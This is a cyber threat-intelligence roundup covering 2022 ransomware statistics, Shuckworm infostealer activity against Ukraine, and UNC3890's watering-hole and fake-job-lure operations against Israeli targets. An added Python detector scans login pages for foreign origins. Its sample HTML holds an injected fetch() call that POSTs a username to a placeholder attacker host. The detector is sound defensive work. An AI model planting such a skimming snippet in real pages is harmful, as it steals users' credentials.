The State of Ransomware in 2022: Cyber Threat Intelligence Roundup
Investigating ransomware data from the first half of 2022, the latest on information-stealing malware deployed by Russia’s Shuckworm APT, and a look at UNC3890 activity observed actively targeting Israeli organizations
This week, we explore whether a widely reported decline in the number of ransomware attacks in the first half of 2022 is legitimate or simply the result of various combined factors contributing to a skewed — and misleading — dataset.
Next, we provide a summary of Symantec’s latest reporting on the activities of the Shuckworm APT, a threat group believed to be associated with Russia’s notorious Federal Security Service (FSB). We also look at the activity of a suspected Iran-linked threat actor, which has so far focused its efforts on the targeting of Israeli shipping, healthcare, and government entities.
1. Is the widely reported drop in ransomware numbers an illusion?
Tim Starks at the Washington Post recently posed an interesting question: Is the supposed drop in the number of ransomware attacks observed thus far in the first half of 2022 a reflection of reality? Or are the declining numbers the result of a perfect storm of contributing factors and information gaps?
The shorter answer seems to be that the issue is not so much whether the number of ransomware attacks has fallen off (CTI’s daily research would seem to support the opposite) but more about whether the sources reporting the numbers have access to less information than ever before. The longer answer seems to be a combination of the two.
So, what’s contributing to the dwindling number of attacks being reported to the people responsible for tracking such things? First, let’s look at the numbers being reported by reputable sources so that we can be sure this isn’t all just conjecture.
From the Washington Post story: “One of the first tallies pointing to a decline came last month from the Ransomware Task Force, made up of experts from government, industry, academia and nonprofits. It documented 64 attacks on local government, hospitals and schools in 2022 to that point, compared with 150 incidents from the same period last year.”
The article also mentions how in July, SonicWall, NCC Group and GuidePoint Security all pointed to decreases across the board. However, the companies covered various time periods.
Of course, not all researchers have reached identical conclusions — a commonplace occurrence in our industry. After all, companies have access to different telemetry and sources. Plus, researchers adhere to different definitions of what constitutes a true ransomware incident.
For example, Avast claimed just last week that ransomware incidents had increased from Q1 to Q2 of 2022 — although Avast had to admit that their researchers observed decreasing numbers of attacks from the end of 2021 and the beginning of 2022. SecureWorks reached a similar conclusion.
So, if ransomware is truly alive and well, what are some of the factors that have contributed to this potentially skewed dataset?
Starks points to the following developments as possible circumstances that may be distorting the numbers:
- Shift in threat actor TTPs: Many ransomware gangs have begun using ransomware-like tactics, minus the malicious software (extortion without encryption), and are now focusing on data theft and threatening to release it without necessarily locking up enterprise systems.
- Shift in targeting: To avoid attracting the ire of policymakers and law enforcement, ransomware gangs have also started targeting smaller organizations. This follows a wave of high-profile ransomware attacks on blue-chip victims like JBS, Kaseya, and Colonial Pipeline last year.
- Smaller targets = smaller resources: Smaller victims are less likely to report their ransomware incidents to any of the entities tasked with keeping track of them.
As stated by Don Smith, vice president of intelligence at SecureWorks’ Counter Threat Unit, “That [shift in targeting] then gives you a situation where, if you’re a medium-to-large enterprise, you may not have a relationship with a national CERT,” or government computer emergency response team. “You may not be prepared to pay for top-tier incident response companies to help you with your problem. And therefore, from that sort of hilltop observation a lot of people may have reporting bias, which can explain this disparity.”
But what if attacks have fallen off?
Of course, at this early stage, many of the factors described above are still considered hypotheses. There remains the possibility — despite the occasional slight disparity in numbers between reporting organizations — that ransomware attacks truly have decreased as of late.
If this is the case, the following may be some contributing factors:
- Sanctions on Russia: Sanctions against Russia, long viewed as a protective haven for the legions of ransomware gangs operating within its borders, may have hampered ransomware operators.
- Major ransomware operations disbanded or were disrupted: After a particularly productive period, the prolific ransomware group Conti apparently disbanded in May, following internal leaks that revealed the gang’s inner workings and the gang’s public (and very unpopular) message of alliance with Russia in the Russia/Ukraine conflict.
Whatever the reason for the apparent drop-off in ransomware incidents, CTI will continue to monitor the situation. We’ll continue to treat ransomware as a top threat and have a better picture of the driving forces behind the reported number of attacks as the year progresses.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“Tim Starks did a great job of illuminating how the statistics reported by various intelligence sources and government agencies can occasionally vary, and sometimes, vary wildly. It’s often all too easy to fall into a pattern of blind faith in the data being presented before us, particularly when that data originates from an entity that has historically proven itself a reliable source of information.
CTI will continue to monitor a variety of sources of ransomware statistics, keeping an eye out for any significant developments which could potentially impact the level of risk posed to Tanium and its suppliers, partners, and customers by extortion gangs.”
2. Infostealer is payload of choice for Russia’s Shuckworm APT in activity targeting Ukraine
A recent blog post from Symantec details new Shuckworm activity observed by the security firm, which has so far been aimed at Ukraine and appears to be delivering information-stealing malware to targeted networks.
According to Symantec, the activity was ongoing as recently as August 8, 2022, and much of the activity observed in this campaign is consistent with activity that was highlighted by CERT-UA on July 26, 2022.
Shuckworm: Russia-Linked Group Maintains #Ukraine Focus – #Gamaredon, #Armageddon malicious activity continues, #infostealer is payload in latest activity. Read blog for latest IoCs: https://t.co/r12KxfM8Hj #Russia #cyberattacks #Shuckworm pic.twitter.com/jY89dctrg8
— Threat Intelligence (@threatintel) August 15, 2022
What is Shuckworm?
Shuckworm (aka Gamaredon or Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. It’s generally considered to be a state-sponsored espionage operation, linked by the Ukrainian Secret Service (SSU) to the FSB.
Ukrainian intelligence has attributed to the group cyber operations targeting thousands of public, private, and governmental entities in the country, in attempts to collect intelligence, disrupt operations, and take control of critical infrastructure targets.
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“There are two notable themes worth addressing in this narrative. The first is the increasing use of information-stealing malware (commonly referred to as info-stealers) among threat actors of all stripes. Intel 471 claims that since the beginning of 2022, the cyber threat intelligence firm has observed a 150% increase in the number of infostealers available on the dark web, compared to the same period in 2021. This is a clear indication of a strong demand among cyber threat actors for such products, as well as an indication of the high degree of attack success such software can aid in precipitating.
The second notable theme is the fact that Symantec’s reporting states that Shuckworm has so far restricted its focus to the targeting of Ukrainian entities. Despite various publicly available reports on the group’s activities, Shuckworm appears undeterred by publicity, and its operations continue unabated. Shuckworm may not be the most sophisticated asset within Russia’s hierarchy of state-backed threat actors, but – as pointed out by Symantec – it more than makes up for its technical shortcomings with its tenacity, persistence, and the relentlessness with which it engages its victims.
As with most of the malware and TTPs employed by the participants of the Russia/Ukraine conflict, the primary risk is “spillover” to Western organizations, networks, and critical infrastructure – the threat of which has been detailed continuously by CISA and its Shields Up initiative.”
3. UNC3890 Iranian hacker activity suspected of targeting Israeli shipping, healthcare, government, and energy sectors
A recent Mandiant report details the firm's tracking of UNC3890, a cluster of activity targeting Israeli shipping, government, energy, and healthcare organizations via social engineering lures and a potential watering hole. Mandiant believes the actor is linked to Iran and likely conducts espionage activity to support Iranian interests.
What is UNC3890?
- UNC is short for uncategorized and refers to a cluster of activity. The operation leverages several publicly available tools, such as Metasploit, Unicorn, and NorthStar C2, in addition to at least two unique tools: a backdoor dubbed SUGARUSH and a browser credential stealer named SUGARDUMP.
- Mandiant first began tracking UNC3890 in late 2021, when it was observed targeting Israeli entities and showing interest in sectors including government, shipping, energy, aviation, and healthcare. While most of the targeting appears to be focused on Israel, some of the entities targeted by the group in the shipping sector were global companies, so the potential impact extends beyond Israel.
- Mandiant was primarily able to uncover post-exploitation implants used by UNC3890, but it also identified a few findings that may shed light on the group's initial access methods.
- A potential watering hole was identified on the login page of a legitimate Israeli shipping company, which researchers believe was likely compromised by UNC3890. Upon loading the legitimate login page, the user's browser would send a POST request containing preliminary data about the logged-in user to an attacker-controlled server. The watering hole is believed to have been used to target clients and users of the shipping company. Mandiant has observed an additional attempted targeting of another major Israeli shipping company by the group that is consistent with the watering hole.
- Several domains resolving to UNC3890’s C2 servers masqueraded as legitimate services and entities, including LinkedIn, Pfizer, Facebook, and Office 365. The domains were likely used to harvest credentials to the legitimate service, to send phishing lures, or as an attempt to blend in with expected network traffic. Mandiant also identified a UNC3890 server hosting several ZIP files containing scraped contents of Facebook and Instagram accounts of legitimate individuals.
- The operation is observed leveraging an XLS file designed to lure the victim with a fake job offer. The file installs SUGARDUMP, a credential harvesting tool. The fake job offer is for a software developer position at LexisNexis.
- After gaining initial access, the group leverages a broad toolset to access and control the environment.
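As an added defensive check (not code from the Mandiant report or this roundup), the following Python scans a login page's markup for form actions, script sources, and URLs embedded in inline scripts whose host is outside the site's own allow-list, which is the pattern described above: a compromised login page quietly POSTing visitor data to a third party. The sample HTML, the trusted hostnames, and the attacker host are constructed placeholders.

```python
"""Flag login-page markup that submits to or loads code from an unexpected origin."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a legitimate login form and first-party script, plus an
# injected inline handler that POSTs form data to a placeholder attacker host.
SAMPLE_HTML = """
<html><body>
<form id="login" method="post" action="https://portal.example-shipping.test/login">
  <input name="user"><input name="pass" type="password">
</form>
<script src="https://cdn.example-shipping.test/app.js"></script>
<script>
  document.getElementById("login").addEventListener("submit", function () {
    fetch("https://collector.attacker-placeholder.test/p", {method: "POST",
          body: JSON.stringify({u: document.querySelector("[name=user]").value})});
  });
</script>
</body></html>
"""

# Absolute http(s) URLs appearing as string literals inside inline scripts.
URL_RE = re.compile(r"""["'](https?://[^"']+)["']""")


class _OriginCollector(HTMLParser):
    """Collects every absolute URL the page submits to or loads code from."""

    def __init__(self):
        super().__init__()
        self.urls = []          # list of (kind, url) pairs
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.urls.append(("form-action", a["action"]))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.urls.append(("script-src", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text.
        if self._in_script:
            for url in URL_RE.findall(data):
                self.urls.append(("inline-script-url", url))


def foreign_origins(html, trusted_hosts):
    """Return (kind, url) pairs whose hostname is not in the trusted allow-list."""
    parser = _OriginCollector()
    parser.feed(html)
    return [(k, u) for k, u in parser.urls if urlparse(u).hostname not in trusted_hosts]
```

Running `foreign_origins(SAMPLE_HTML, {"portal.example-shipping.test", "cdn.example-shipping.test"})` returns only the injected collector URL; the same function can be pointed at a fetched copy of a real login page with that site's own hostnames as the allow-list.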
Analyst comments from Tanium’s Cyber Threat Intelligence Team
“The fake job offer lure seems to be gaining popularity amongst threat actors lately (not to mention that it is a historically popular technique among Iran-linked threat actors, specifically) and UNC3890 is just the latest group to join the trend.
What’s a little different about UNC3890 is its targeting of shipping companies. Since it’s unclear exactly what data the threat actor gained access to when it reportedly deployed a watering hole against an Israeli shipping company, it is unclear what exactly the end goal was. Nonetheless, the operation’s use of custom credential harvesting tools and backdoors is indicative of a higher degree of adversarial sophistication.”